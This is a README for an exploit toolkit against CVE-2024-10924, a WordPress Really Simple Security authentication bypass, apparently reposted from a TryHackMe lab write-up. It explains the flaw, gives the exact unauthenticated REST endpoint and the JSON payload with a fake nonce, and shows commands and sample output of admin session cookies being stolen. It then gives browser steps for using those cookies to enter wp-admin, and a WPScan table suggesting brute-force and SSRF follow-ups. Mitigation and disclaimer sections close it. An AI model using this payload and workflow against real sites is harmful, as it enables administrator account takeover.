Share
## https://sploitus.com/exploit?id=F9C3796A-99FC-539D-8E46-4634B84EA1DB
# CVE-2024-10924 β€” WordPress Auth Bypass Toolkit

> **Really Simple Security Plugin | Authentication Bypass via 2FA REST API**  
> CVSS Score: **9.8 CRITICAL** | Affects: 4,000,000+ WordPress sites

```
  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—  β–ˆβ–ˆβ•—
 β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•    β•šβ•β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ•β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘
 β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘
 β–ˆβ–ˆβ•‘     β•šβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•”β•β•β•β•šβ•β•β•β•β•β–ˆβ–ˆβ•”β•β•β•β• β–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β• β•šβ•β•β•β•β–ˆβ–ˆβ•‘
 β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—      β–ˆβ–ˆβ•‘
  β•šβ•β•β•β•β•β•  β•šβ•β•β•β•  β•šβ•β•β•β•β•β•β•    β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β•β•      β•šβ•β•
```

> ⚠️ **For authorized penetration testing and educational purposes only.**  
> Unauthorized use against systems you do not own is illegal.

---

## πŸ“‹ Table of Contents

- [Overview](#overview)
- [Vulnerability Explained](#vulnerability-explained)
- [Tools](#tools)
- [Usage](#usage)
- [How the Exploit Works](#how-the-exploit-works)
- [WPScan Findings Reference](#wpscan-findings-reference)
- [Mitigation](#mitigation)

---

## Overview

In November 2024, security researcher **IstvΓ‘n MΓ‘rton** from Wordfence discovered a critical authentication bypass vulnerability in the **Really Simple Security** plugin for WordPress (formerly Really Simple SSL). The flaw was assigned **CVE-2024-10924** and rated **9.8 CRITICAL**.

The vulnerability allows an **unauthenticated attacker** to log in as **any user** on the target site β€” including administrators β€” without knowing their password. All that's needed is the target user's WordPress user ID, which is publicly available via the REST API.

| Property | Detail |
|---|---|
| **CVE ID** | CVE-2024-10924 |
| **CVSS Score** | 9.8 CRITICAL |
| **Plugin** | Really Simple Security (Free, Pro, Pro Multisite) |
| **Affected Versions** | 9.0.0 – 9.1.1.1 |
| **Attack Vector** | Network (unauthenticated) |
| **Discovered By** | IstvΓ‘n MΓ‘rton, Wordfence |
| **Published** | November 2024 |
| **Patched In** | 9.1.2 |

---

## Vulnerability Explained

The vulnerability lives inside the `check_login_and_get_user()` function used by the plugin's Two-Factor Authentication REST API endpoints.

**The Buggy Logic (simplified):**

```php
function check_login_and_get_user($user_id, $login_nonce) {
    
    $user = get_user_by('id', $user_id);

    if (!wp_verify_nonce($login_nonce)) {
        // ❌ Error detected but never acted upon!
        // Missing: return new WP_Error(...)
    }

    return $user; // Returns the user object regardless!
}
```

The function checks whether the `login_nonce` is valid β€” but **forgets to stop execution** if validation fails. So even with a completely fake nonce (`"1"`), the function returns a valid user object and grants an authenticated session.

**The Fix (one line):**

```php
if (!wp_verify_nonce($login_nonce)) {
    return new WP_Error('invalid_nonce', 'Invalid login nonce'); // βœ… Now it stops
}
```

---

## Tools

This repository contains two Python tools. Both use **zero external dependencies** β€” pure Python stdlib only.

### πŸ” `wp_cookie-bypass.py` β€” Scanner

Checks whether a target WordPress site is vulnerable to CVE-2024-10924.

**What it does:**
- Detects WordPress presence
- Checks `/wp-login.php` and `/wp-admin/` accessibility
- Discovers the REST API endpoint (pretty URLs and query-string fallback)
- Checks for the `reallysimplessl` plugin namespace
- Enumerates WordPress users via the REST API
- Attempts the authentication bypass for each discovered user
- Reports clearly: **VULNERABLE** or **NOT VULNERABLE**

---

### πŸ’₯ `wp_cookie-exploit.py` β€” Exploiter

Fully exploits CVE-2024-10924 and returns the user ID, username, and session cookies for every bypassed account.

**What it does:**
- Auto-detects REST API base
- Confirms plugin presence
- Enumerates users (with brute-force fallback for IDs 1–5)
- Fires the exploit payload for each user
- Returns `user ID`, `username`, and full `session cookies` on success
- Tells you exactly how to use the cookies to access wp-admin

---

## Usage

![Scan output](screenshots/wp_ghost_cookie.png)
![Exploit output](screenshots/wp_ghost_cookie2.png)
![Bypass success](screenshots/wp_ghost_cookie3.png)

No installation required β€” just Python 3.

```bash
# Scanner β€” check if target is vulnerable
python3 wp_cookie-bypass.py http://target.com

# Exploiter β€” bypass auth and get cookies
python3 wp_cookie-exploit.py http://target.com
```

**Example output (Exploiter):**

```
  ╔═══════════════════════════════════════════════════════╗
  β•‘         CVE-2024-10924  β€”  Auth Bypass Exploiter      β•‘
  β•‘         Really Simple Security Plugin  |  WordPress   β•‘
  β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•

  Target : http://vulnerable.thm:8080
  ─────────────────────────────────────────────────────

  [*] Detecting REST API...
  [βœ“] REST API β†’ http://vulnerable.thm:8080/index.php?rest_route=

  [*] Checking for Really Simple Security plugin...
  [βœ“] Plugin detected β€” target may be vulnerable!

  [*] Enumerating WordPress users...
  [βœ“] User found β†’ admin  (ID: 1)

  ─────────────────────────────────────────────────────
    LAUNCHING EXPLOIT β€” CVE-2024-10924
  ─────────────────────────────────────────────────────

  [*] Targeting β†’ admin (ID: 1)
  [βœ“] BYPASS SUCCESSFUL!
      User   : admin
      ID     : 1
      Cookie : wordpress_eb51341d... = admin%7C17744422...
      Cookie : wordpress_logged_in_eb51341d... = admin%7C17744422...

  ═════════════════════════════════════════════════════
    βœ“ EXPLOITED β€” 1 account(s) compromised
    β†’ admin (ID: 1)

    Paste cookies into browser β†’ DevTools β†’ Application β†’ Cookies
    Then navigate to http://vulnerable.thm:8080/wp-admin/
  ═════════════════════════════════════════════════════
```

**Using the cookies in your browser:**

1. Open browser DevTools (`F12`)
2. Go to **Application** β†’ **Cookies** β†’ select the target domain
3. Paste both cookie values (`wordpress_*` and `wordpress_logged_in_*`)
4. Navigate to `/wp-admin/` β€” you're in!

---

## How the Exploit Works

The vulnerable REST API endpoint is:

```
POST /wp-json/reallysimplessl/v1/two_fa/skip_onboarding
```

(Or via query string if pretty permalinks are off:)

```
POST /index.php?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding
```

The exploit sends this payload with no prior authentication:

```json
{
  "user_id": 1,
  "login_nonce": "1",
  "redirect_to": "/wp-admin/"
}
```

Due to the missing error handling in `check_login_and_get_user()`, the server responds with **HTTP 200** and sets fully authenticated WordPress session cookies β€” without ever verifying the nonce or requiring a password.

The endpoint accepts **3 parameters**: `user_id`, `login_nonce`, and `redirect_to`.

---

## WPScan Findings Reference

When scanning a WordPress target with WPScan, here are the key findings to look out for and what to do with each:

| Finding | Risk | Action |
|---|---|---|
| `xmlrpc.php` accessible | πŸ”΄ High | Brute-force logins, pingback abuse, SSRF |
| `readme.html` exposed | 🟑 Medium | Reveals WP version β†’ search CVEs |
| Upload directory listing enabled | πŸ”΄ High | Browse for sensitive/uploaded files |
| WordPress version outdated | πŸ”΄ High | Cross-reference against known CVEs |
| User enumeration successful | πŸ”΄ High | Use usernames for password or bypass attacks |
| Server version header exposed | 🟑 Medium | Apache/Nginx version fingerprinting |
| `wp-cron.php` accessible | 🟠 Medium | Potential DoS via repeated triggering |

In our TryHackMe session, WPScan discovered:
- WordPress **6.7.1** (flagged as insecure)
- Apache **2.4.41** on Ubuntu
- `xmlrpc.php` accessible
- `readme.html` accessible
- Upload directory listing enabled
- Users: **admin** and **tesla**

---

## Mitigation

**If you manage a WordPress site:**

1. **Update** the Really Simple Security plugin to **version 9.1.2 or later** immediately
2. **Disable 2FA** temporarily if you cannot update right now (the vulnerability requires 2FA to be enabled)
3. Add a **WAF rule** to block unauthenticated POST requests to `/reallysimplessl/v1/two_fa/` endpoints
4. Audit your installed plugins regularly against known CVE databases

**General WordPress hardening:**
- Disable `xmlrpc.php` if not needed
- Remove `readme.html`
- Disable directory listing in Apache/Nginx config
- Block user enumeration via the REST API
- Keep WordPress core and all plugins up to date

---

## Disclaimer

This toolkit was developed for the ** CVE-2024-10924 ** for educational purposes. Only use these tools against systems you own or have explicit written permission to test. The authors are not responsible for any misuse.

---

**Made by MrDestroyer - ZIM**  
YouTube: [Study_Hard69](https://www.youtube.com/Study_Hard69)  
TryHackMe: [/p/MohammadZim](https://tryhackme.com/p/MohammadZim)